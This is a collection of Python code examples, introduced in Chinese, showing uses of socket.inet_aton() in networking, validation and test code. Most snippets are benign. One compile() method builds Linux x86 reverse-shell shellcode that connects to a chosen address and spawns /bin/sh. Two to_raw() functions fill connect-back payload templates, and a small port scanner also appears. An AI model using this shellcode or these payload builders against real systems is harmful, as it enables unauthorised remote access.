我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用socket.inet_aton()。
def setup_sockets(self):
    """Open one UDP socket per local interface plus one shared multicast socket.

    For every address returned by ``get_interface_addresses`` a dedicated
    UDP socket is bound to ``(ip, self.port)`` and the shared multicast
    socket is subscribed to the group ``self.address`` on that interface.

    Results are stored on the instance:

    * ``self.ip_addresses`` -- the interface addresses that were used
    * ``self.sockets``      -- mapping of interface ip -> bound socket
    * ``self.socks``        -- the same sockets as a plain list
    * ``self.multi_sock``   -- the multicast socket, bound to ``("", self.port)``
    """
    self.sockets = {}
    self.ip_addresses = get_interface_addresses(self.logger)

    group_sock = socket.socket(
        socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    group_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    group_sock.setsockopt(
        socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, self.ttl)

    for iface_ip in self.ip_addresses:
        iface_sock = socket.socket(
            socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        iface_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        # Membership request: packed group address followed by the packed
        # address of the interface that should join the group.
        membership = (socket.inet_aton(self.address)
                      + socket.inet_aton(iface_ip))
        group_sock.setsockopt(
            socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership)
        self.logger.info(
            "Regestering multicast for: %s: %s" % (self.address, iface_ip))

        iface_sock.bind((iface_ip, self.port))
        self.sockets[iface_ip] = iface_sock

    group_sock.bind(("", self.port))

    self.socks = list(self.sockets.values())
    self.multi_sock = group_sock
def is_valid_cidr(string_network):
    """
    Perform a very simple sanity check of a CIDR string (as used in the
    ``no_proxy`` variable).

    The value must contain exactly one ``/``, the part after it must be an
    integer between 1 and 32 inclusive, and the part before it must be
    accepted by ``socket.inet_aton``.

    :rtype: bool
    """
    # Guard clause: anything without exactly one slash is not CIDR notation.
    if string_network.count('/') != 1:
        return False

    address, prefix = string_network.split('/')

    try:
        mask = int(prefix)
    except ValueError:
        return False

    if not 1 <= mask <= 32:
        return False

    try:
        socket.inet_aton(address)
    except socket.error:
        return False

    return True
def addressInNetwork(self, ip, cidr):
    """Return True if ``ip`` lies inside the IPv4 network ``cidr``.

    :param ip: the address to test. Accepted forms are a decimal integer
        (as ``int`` or ``str``; negative values are interpreted as signed
        32-bit integers), a dotted-quad string, or the empty string.
    :param cidr: network in ``a.b.c.d/bits`` notation, ``0 <= bits <= 32``.
    :return: ``True`` when the address is in the network; ``False``
        otherwise, including for any malformed ``ip`` or ``cidr``.
    """
    # the ip can be the empty string ('') in cases where the connection
    # is made via a web proxy.  in these cases the sensor cannot report
    # the true remote IP as DNS resolution happens on the web proxy (and
    # not the endpoint)
    if '' == ip:
        return False

    try:
        parts = cidr.split('/')
        net = parts[0]
        bits = int(parts[1])
        if not 0 <= bits <= 32:
            return False

        try:
            numeric_ip = int(ip)
        except ValueError:
            # Not a plain integer: treat it as dotted-quad text.
            ipaddr = struct.unpack('!L', socket.inet_aton(ip))[0]
        else:
            if numeric_ip > 0xFFFFFFFF:
                return False
            # Masking folds a negative (signed 32-bit) value onto its
            # unsigned equivalent and leaves non-negative values alone.
            ipaddr = numeric_ip & 0xFFFFFFFF

        # Work in network (big-endian) order so that the prefix occupies
        # the HIGH bits.  A little-endian unpack combined with a low-bit
        # mask is only correct when ``bits`` is a multiple of 8.
        netaddr = struct.unpack('!L', socket.inet_aton(net))[0]
        netmask = (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF
        return (ipaddr & netmask) == (netaddr & netmask)
    except (ValueError, IndexError, TypeError, AttributeError,
            socket.error, struct.error):
        # Best effort: malformed input simply means "not in the network".
        return False
def consume(self, doc, _):
    """
    Record every match of the compiled pattern in the document text as an
    entity on the document.

    Matches whose named group is ``ip_addr`` are only recorded when
    ``socket.inet_aton`` accepts the matched text.

    :param doc: Document object.
    :type doc: ``gransk.core.document.Document``
    """
    if not doc.text:
        return

    found = doc.entities

    for match in self.pattern.finditer(doc.text):
        group_name = match.lastgroup
        value = match.group(group_name)

        if group_name == 'ip_addr':
            # The regex alone can match things like 999.1.1.1; let the
            # socket layer reject those.
            try:
                socket.inet_aton(value)
            except socket.error:
                continue

        found.add(match.start(group_name), group_name, value)
def inet_pton(address_family, ip_string):
    """Convert a textual IP address to its packed binary form.

    IPv4 is delegated to ``socket.inet_aton``.  Every other family goes
    through ``WSAStringToAddressA`` with a ``sockaddr`` buffer (both are
    defined elsewhere in this module -- presumably ctypes bindings for
    Winsock; confirm against the surrounding file).

    :param address_family: ``socket.AF_INET`` or ``socket.AF_INET6``.
    :param ip_string: the address in text form.
    :return: the packed address (16 bytes for IPv6).
    :raises socket.error: if the conversion call reports failure, or the
        family is neither IPv4 nor IPv6.
    """
    if address_family == socket.AF_INET:
        return socket.inet_aton(ip_string)

    addr = sockaddr()
    addr.sa_family = address_family
    addr_size = ctypes.c_int(ctypes.sizeof(addr))

    status = WSAStringToAddressA(
        ip_string,
        address_family,
        None,
        ctypes.byref(addr),
        ctypes.byref(addr_size),
    )
    if status != 0:
        raise socket.error(ctypes.FormatError())

    # Only the IPv6 member of the structure is read back here.
    if address_family != socket.AF_INET6:
        raise socket.error('unknown address family')
    return ctypes.string_at(addr.ipv6_addr, 16)
def is_valid_cidr(string_network):
    """Very simple check of the cidr format in no_proxy variable.

    Returns True only for ``<address>/<mask>`` where ``<mask>`` is an
    integer from 1 to 32 and ``<address>`` is accepted by
    ``socket.inet_aton``; returns False for everything else.
    """
    pieces = string_network.split('/')
    # Exactly one '/' separator yields exactly two pieces.
    if len(pieces) != 2:
        return False
    host_part, mask_part = pieces

    try:
        mask = int(mask_part)
    except ValueError:
        return False

    mask_in_range = 1 <= mask <= 32
    if not mask_in_range:
        return False

    try:
        socket.inet_aton(host_part)
    except socket.error:
        return False
    else:
        return True
def __init__(self, server=DEFAULT_SERVER, port=DEFAULT_PORT, local_ip=None,
             debug=False, ip_forward=False):
    """Store connection settings and resolve the packed local IP address.

    :param server: server address; also used as the local IP when
        ``ip_forward`` is true.
    :param port: server port.
    :param local_ip: explicit local IPv4 address; when ``None`` (and
        ``ip_forward`` is false) the address is looked up via ``IpFinder``.
    :param debug: debug flag stored on the instance.
    :param ip_forward: when true, use ``server`` as the IP instead of a
        local address.
    :raises AssertionError: if no local IP address could be determined.

    After construction ``self.ip`` holds the 4-byte packed form produced by
    ``socket.inet_aton``.
    """
    self.server = server
    self.port = port
    self.uid = b'test'
    self.ip = None
    self.debug = debug

    if ip_forward:
        self.ip = self.server
    elif local_ip is not None:
        self.ip = local_ip
    else:
        # only available for dormitory subnet
        import IpFinder
        self.ip = (IpFinder.get_ip_startswith('10.21.')
                   or IpFinder.get_ip_startswith('10.20.'))

    # Raised explicitly (rather than via an ``assert`` statement) so the
    # check still runs under ``python -O``; the exception type is kept so
    # existing callers that handle AssertionError keep working.
    if not ip_forward and self.ip is None:
        raise AssertionError(
            'Can not find a correct local ip address. '
            'Please specify the IP address through command-line argument '
            'using --ip')

    self.ip = socket.inet_aton(self.ip)
def to_raw(self, host, port):  #pylint:disable=arguments-differ
    '''
    Fill the payload template with the connect-back address and return the
    raw payload.

    :param host: string representing the ip address or domain name to connect back to
    :param port: port to connect to on the remote host (0-65535)
    :return: ``self.hex_code`` with the hex-encoded port and IPv4 address
        substituted (in that order), decoded from hex to raw bytes
    :raises ValueError: if ``port`` is outside 0-65535
    '''
    import binascii

    l.debug("Connecting back to %s:%d", host, port)

    # Validate before doing the DNS lookup.  65535 is a valid port and fits
    # the unsigned 16-bit "!H" field, so only values above it are rejected.
    if port < 0 or port > 65535:
        raise ValueError("invalid port specified")

    target_ip = socket.gethostbyname(host)

    # binascii works on both Python 2 and 3 (str.encode('hex') is 2-only).
    # NOTE(review): assumes self.hex_code is a text template with two %s
    # placeholders -- confirm against the class definition.
    raw_ip = binascii.hexlify(socket.inet_aton(target_ip)).decode('ascii')
    raw_port = binascii.hexlify(struct.pack("!H", port)).decode('ascii')

    return binascii.unhexlify(self.hex_code % (raw_port, raw_ip))
def to_raw(self, host, port):  #pylint:disable=arguments-differ
    '''
    Fill the payload template with the connect-back address and return the
    raw payload.

    :param host: string representing the ip address or domain name to connect back to
    :param port: port to connect to on the remote host (0-65535)
    :return: ``self.hex_code`` with the hex-encoded IPv4 address and port
        substituted (in that order), decoded from hex to raw bytes
    :raises ValueError: if ``port`` is outside 0-65535
    '''
    import binascii

    l.debug("Connecting back to %s:%d", host, port)

    # Validate before doing the DNS lookup.  65535 is a valid port and fits
    # the unsigned 16-bit "!H" field, so only values above it are rejected.
    if port < 0 or port > 65535:
        raise ValueError("invalid port specified")

    target_ip = socket.gethostbyname(host)

    # binascii works on both Python 2 and 3 (str.encode('hex') is 2-only).
    # NOTE(review): assumes self.hex_code is a text template with two %s
    # placeholders -- confirm against the class definition.
    raw_ip = binascii.hexlify(socket.inet_aton(target_ip)).decode('ascii')
    raw_port = binascii.hexlify(struct.pack("!H", port)).decode('ascii')

    # This variant's template expects the address first, then the port.
    return binascii.unhexlify(self.hex_code % (raw_ip, raw_port))
def ipv4(address):
    """Validate an option value as an IPv4 address and return it.

    Any ``http://`` / ``https://`` text is removed first.  The remainder is
    checked with ``socket.inet_pton``; when that function is unavailable
    the check falls back to ``socket.inet_aton`` plus a requirement of
    exactly three dots.

    :param address: option value supplied by the user.
    :return: the address with the scheme text removed.
    :raises OptionValidationError: if the value is not a valid IPv4 address.
    """
    for scheme in ("http://", "https://"):
        address = address.replace(scheme, "")

    try:
        socket.inet_pton(socket.AF_INET, address)
    except AttributeError:
        # No inet_pton on this platform: inet_aton also accepts short
        # forms such as "1.2", hence the additional dot count.
        try:
            socket.inet_aton(address)
        except socket.error:
            raise OptionValidationError("Option have to be valid IP address.")

        if address.count('.') != 3:
            raise OptionValidationError("Option have to be valid IP address.")
    except socket.error:
        raise OptionValidationError("Option have to be valid IP address.")

    return address
def is_ipv4(value):
    """Tell whether a value is a valid IPv4 address.

    ``socket.inet_pton`` is used when available; otherwise the check falls
    back to ``socket.inet_aton`` combined with a three-dot requirement.

    :param value: The value to match against.
    :return: True if the value is a valid IPv4.
    """
    try:
        socket.inet_pton(socket.AF_INET, value)
        return True
    except AttributeError:
        # inet_pton is missing here; use the fallback below.
        pass
    except socket.error:
        # not a valid address
        return False

    try:
        socket.inet_aton(value)
    except socket.error:
        return False
    return value.count('.') == 3
def is_valid_ipv4_address(address):
    """Return True if ``address`` is a valid IPv4 address string.

    Prefers ``socket.inet_pton``; where that function does not exist the
    check uses ``socket.inet_aton`` and additionally requires exactly three
    dots in the text.
    """
    strict_parser_missing = False
    try:
        socket.inet_pton(socket.AF_INET, address)
    except AttributeError:
        strict_parser_missing = True
    except socket.error:
        # not a valid address
        return False

    if not strict_parser_missing:
        return True

    try:
        socket.inet_aton(address)
    except socket.error:
        return False
    dots = address.count('.')
    return dots == 3


# NOTE(review): the comment that followed this function was lost to a
# character-encoding error (only '?' placeholders survive).  The remaining
# fragments mention "OID", a '%s' placeholder and the character '0';
# restore the original wording from the upstream source.
def addUTMPEntry(self, loggedIn=1):
    """Write a login or logout record for this session to utmp and wtmp.

    Does nothing when the ``utmp`` module is unavailable (falsy).

    :param loggedIn: truthy to record a login (``USER_PROCESS`` entry with
        user name, host name and address filled in); falsy to record a
        logout (``DEAD_PROCESS`` entry).
    """
    if not utmp:
        return

    ipAddress = self.avatar.conn.transport.transport.getPeer().host

    # "=L" selects the standard 4-byte size while keeping native byte
    # order.  A bare "L" uses the native size, which is 8 bytes on LP64
    # platforms and makes unpacking the 4-byte address raise struct.error.
    packedIp, = struct.unpack('=L', socket.inet_aton(ipAddress))

    # NOTE(review): the slice drops the first five characters of the pty
    # name -- presumably a "/dev/" prefix; confirm against ptyTuple.
    ttyName = self.ptyTuple[2][5:]

    # Split the current time into whole seconds and microseconds.
    t = time.time()
    t1 = int(t)
    t2 = int((t - t1) * 1e6)

    entry = utmp.UtmpEntry()
    entry.ut_type = utmp.USER_PROCESS if loggedIn else utmp.DEAD_PROCESS
    entry.ut_pid = self.pty.pid
    entry.ut_line = ttyName
    entry.ut_id = ttyName[-4:]
    entry.ut_tv = (t1, t2)
    if loggedIn:
        entry.ut_user = self.avatar.username
        entry.ut_host = socket.gethostbyaddr(ipAddress)[0]
        entry.ut_addr_v6 = (packedIp, 0, 0, 0)

    # The same entry goes to the utmp file first, then the wtmp file.
    for record_path in (utmp.UTMP_FILE, utmp.WTMP_FILE):
        record = utmp.UtmpRecord(record_path)
        record.pututline(entry)
        record.endutent()
def test_simple(self):
    """A connect request is accepted and data is relayed in both directions.

    NOTE(review): the packed header (version 4, command 1, port 34) and the
    reply code 90 look like a SOCKS4 CONNECT exchange -- confirm against
    the protocol class under test.
    """
    # Byte literals throughout: struct.pack() and inet_aton() return bytes,
    # and bytes cannot be concatenated with text on Python 3.
    self.sock.dataReceived(
        struct.pack('!BBH', 4, 1, 34)
        + socket.inet_aton('1.2.3.4')
        + b'fooBAR'
        + b'\0')
    sent = self.sock.transport.value()
    self.sock.transport.clear()
    self.assertEqual(sent,
                     struct.pack('!BBH', 0, 90, 34)
                     + socket.inet_aton('1.2.3.4'))
    self.assertFalse(self.sock.transport.stringTCPTransport_closing)
    self.assertTrue(self.sock.driver_outgoing is not None)

    # pass some data through
    self.sock.dataReceived(b'hello, world')
    self.assertEqual(self.sock.driver_outgoing.transport.value(),
                     b'hello, world')

    # the other way around
    self.sock.driver_outgoing.dataReceived(b'hi there')
    self.assertEqual(self.sock.transport.value(), b'hi there')

    self.sock.connectionLost('fake reason')
def test_eof_remote(self):
    """Data is relayed, then the outgoing (server) side closes the connection."""
    # Byte literals throughout: struct.pack() and inet_aton() return bytes,
    # and bytes cannot be concatenated with text on Python 3.
    self.sock.dataReceived(
        struct.pack('!BBH', 4, 1, 34)
        + socket.inet_aton('1.2.3.4')
        + b'fooBAR'
        + b'\0')
    # The reply is read and discarded; its content is not checked here.
    self.sock.transport.value()
    self.sock.transport.clear()

    # pass some data through
    self.sock.dataReceived(b'hello, world')
    self.assertEqual(self.sock.driver_outgoing.transport.value(),
                     b'hello, world')

    # now close it from the server side
    self.sock.driver_outgoing.transport.loseConnection()
    self.sock.driver_outgoing.connectionLost('fake reason')
def test_eof_local(self):
    """Data is relayed, then the client side of the connection is lost."""
    # Byte literals throughout: struct.pack() and inet_aton() return bytes,
    # and bytes cannot be concatenated with text on Python 3.
    self.sock.dataReceived(
        struct.pack('!BBH', 4, 1, 34)
        + socket.inet_aton('1.2.3.4')
        + b'fooBAR'
        + b'\0')
    # The reply is read and discarded; its content is not checked here.
    self.sock.transport.value()
    self.sock.transport.clear()

    # pass some data through
    self.sock.dataReceived(b'hello, world')
    self.assertEqual(self.sock.driver_outgoing.transport.value(),
                     b'hello, world')

    # now close it from the client side
    self.sock.connectionLost('fake reason')
def test_bad_source(self):
    """An incoming connection from an unexpected address is refused.

    NOTE(review): command 2 in the request header and reply code 91 look
    like a SOCKS4 BIND request being rejected -- confirm against the
    protocol class under test.
    """
    # Byte literals throughout: struct.pack() and inet_aton() return bytes,
    # and bytes cannot be concatenated with text on Python 3.
    self.sock.dataReceived(
        struct.pack('!BBH', 4, 2, 34)
        + socket.inet_aton('1.2.3.4')
        + b'fooBAR'
        + b'\0')
    # The first reply is read and discarded; only the second is checked.
    self.sock.transport.value()
    self.sock.transport.clear()

    # connect from WRONG address
    incoming = self.sock.driver_listen.buildProtocol(('1.6.6.6', 666))
    self.assertIdentical(incoming, None)

    # Now we should have the second reply packet and it should
    # be a failure. The connection should be closing.
    sent = self.sock.transport.value()
    self.sock.transport.clear()
    self.assertEqual(sent,
                     struct.pack('!BBH', 0, 91, 0)
                     + socket.inet_aton('0.0.0.0'))
    self.assertTrue(self.sock.transport.stringTCPTransport_closing)
def single_host(ip):
    """Probe every port in ``PORTS`` on one host and report its state.

    :param ip: IPv4 address of the host, as text.
    :return: one line per port formatted as ``'{port:>5}/tcp {state:>7}'``
        where state is ``open`` or ``closed``, joined with newlines; or the
        string ``'Error: Invalid IP address.'`` if ``ip`` is rejected by
        ``socket.inet_aton``.
    """
    try:
        socket.inet_aton(ip)
    except socket.error:
        return 'Error: Invalid IP address.'

    lines = []
    for port in PORTS:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            # The timeout has to be set on the socket BEFORE connecting.
            # A process-wide setdefaulttimeout() issued after connect_ex()
            # leaves the first probe without any timeout and leaks the
            # setting into unrelated sockets.
            sock.settimeout(0.5)
            status = sock.connect_ex((ip, port))
        finally:
            # Always release the descriptor, even if connect_ex() raises.
            sock.close()

        state = 'open' if not status else 'closed'
        lines.append('{:>5}/tcp {:>7}'.format(port, state))

    return '\n'.join(lines)
def __init__(self, chnroutes, blacklists, using_rfc1918):
    """Build the sorted subnet table and the blacklist set.

    :param chnroutes: iterable of networks in ``a.b.c.d/bits`` notation;
        entries that ``self.convert`` cannot parse are skipped.
    :param blacklists: iterable of IPv4 address strings; entries rejected
        by ``socket.inet_aton`` are skipped.
    :param using_rfc1918: when true, the private ranges 192.168.0.0/16,
        10.0.0.0/8 and 172.16.0.0/12 are added to the subnet table.

    ``self.china_subs`` ends up as a sorted list of ``(lowest, highest)``
    integer pairs and ``self.blackips`` as a set of integer addresses.
    """
    self.china_subs = []
    self.blackips = set()

    for sub in chnroutes:
        bounds = self.convert(sub)
        # convert() reports failure as (-1, -1) (or by returning nothing).
        # A truthiness test is wrong here: -1 is truthy, so failures would
        # be stored, while a legitimate range starting at address 0 would
        # be dropped.
        if not bounds or bounds[0] < 0 or bounds[1] < 0:
            continue
        self.china_subs.append((bounds[0], bounds[1]))

    for ip in blacklists:
        try:
            self.blackips.add(struct.unpack('>I', socket.inet_aton(ip))[0])
        except socket.error:
            continue

    if using_rfc1918:
        for private_net in ("192.168.0.0/16", "10.0.0.0/8", "172.16.0.0/12"):
            self.china_subs.append(self.convert(private_net))

    # The range lookup relies on this ordering.
    self.china_subs.sort()
def convert(self, net):
    """Convert ``a.b.c.d/bits`` into the integer range it covers.

    :param net: network in CIDR notation.
    :return: ``(lowest, highest)`` as unsigned 32-bit integers, or
        ``(-1, -1)`` for any malformed input (wrong number of ``/``, empty
        or unparsable address, empty or non-numeric mask, mask outside
        0-32).
    """
    invalid = (-1, -1)

    parts = net.split('/')
    if len(parts) != 2:
        return invalid

    ip_s, mask_s = parts
    # An empty address or mask used to fall through and return None,
    # which callers that unpack the result cannot handle.
    if not ip_s or not mask_s:
        return invalid

    try:
        ip = struct.unpack('>I', socket.inet_aton(ip_s))[0]
        mask = int(mask_s)
    except (socket.error, ValueError):
        return invalid

    if mask < 0 or mask > 32:
        return invalid

    # Number of addresses in the block; the mask keeps the top bits.
    block_size = 1 << (32 - mask)
    hex_mask = 0xffffffff - block_size + 1
    lowest = ip & hex_mask
    highest = lowest + block_size - 1
    return (lowest, highest)
def is_in_china(self, str_ip):
    '''Binary-search the sorted ``self.china_subs`` ranges for an address.

    :param str_ip: IPv4 address as text.
    :return: True if the address falls inside one of the
        ``(lowest, highest)`` ranges; False otherwise, including when
        ``socket.inet_aton`` rejects the address.
    '''
    try:
        (target,) = struct.unpack('>I', socket.inet_aton(str_ip))
    except socket.error:
        return False

    low, high = 0, len(self.china_subs) - 1
    while low <= high:
        middle = (low + high) // 2
        span = self.china_subs[middle]
        if target > span[1]:
            # Above this range: continue in the upper half.
            low = middle + 1
        elif target < span[0]:
            # Below this range: continue in the lower half.
            high = middle - 1
        else:
            return True
    return False
def is_ip(address):
    """
    Report whether ``address`` is accepted by ``socket.inet_aton`` as an
    IPv4 address.

    Returns True when it parses, False when ``socket.error`` is raised.
    """
    try:
        # Test to see if already an IPv4 address
        socket.inet_aton(address)
    except socket.error:
        return False
    else:
        return True
def address(self, address):
    """Store ``address`` after checking that it is a parsable IPv4 address.

    :param address: IPv4 address as text.
    :raises socket.error: propagated from ``inet_aton`` when the text is
        rejected; in that case the stored value is left untouched.
    """
    # The packed result is not needed; the call is made only so that an
    # invalid address raises before anything is stored.
    inet_aton(address)
    self.__address = address
def compile(self, state = None):
    """Assemble the payload with this object's address and port embedded.

    The packed IPv4 address (``self.address``) and the big-endian 16-bit
    port (``self.port``) are spliced between fixed byte sequences.  The
    "nullfree" encoding tag is added when the result contains no NUL byte
    and removed when it does.

    :param state: not used by this implementation.
    :return: the assembled payload as a byte string.
    """
    # Byte literals are required: inet_aton() and pack() return bytes,
    # which cannot be concatenated with text on Python 3.  The local is
    # named ``payload`` so the ``bytes`` builtin is not shadowed.
    payload = (
        b"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0"
        b"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68"
    ) + inet_aton(self.address) + (
        b"\x66\x68"
    ) + pack("!H", self.port) + (
        b"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1"
        b"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    )

    # The fixed parts contain no NUL byte, so only the address and port
    # decide which way this goes.
    if b"\x00" in payload:
        self.remove_encoding("nullfree")
    else:
        self.add_encoding("nullfree")

    return payload
def localnet_register(host, port):
    '''
    Advertise this server on the local network via Zeroconf, then loop
    forever so the registration stays alive.

    This call never returns once the service is registered, so it is meant
    to be run in its own thread.  If the ``zeroconf`` package cannot be
    imported, an error is logged and the function returns immediately.

    :param host: host name; its dots are replaced by dashes to form part
        of the service name.
    :param port: port to advertise (converted with ``int``).
    '''
    try:
        from zeroconf import ServiceInfo, Zeroconf
        from time import sleep
    except ImportError:
        logging.error(
            'Zeroconf not installed, cannot register this server on the local '
            'network. Other players may still connect, but they must be told '
            'what your hostname and port are (hostname: {}, port: {})'.format(
                host, port))
        return

    advertised_interface = local_address('127.0.0.1')

    service_type = "_defusedivision._tcp.local."
    service_name = "{}{}._defusedivision._tcp.local.".format(
        host.replace('.', '-'), advertised_interface.replace('.', '-'))

    info = ServiceInfo(
        service_type,
        service_name,
        address=socket.inet_aton(advertised_interface),
        port=int(port),
        weight=0,
        priority=0,
        properties=b"")

    zc = Zeroconf()
    zc.register_service(info)
    # Close the Zeroconf instance when the interpreter exits.
    atexit.register(zc.close)

    # Keep this thread alive indefinitely.
    while True:
        sleep(0.1)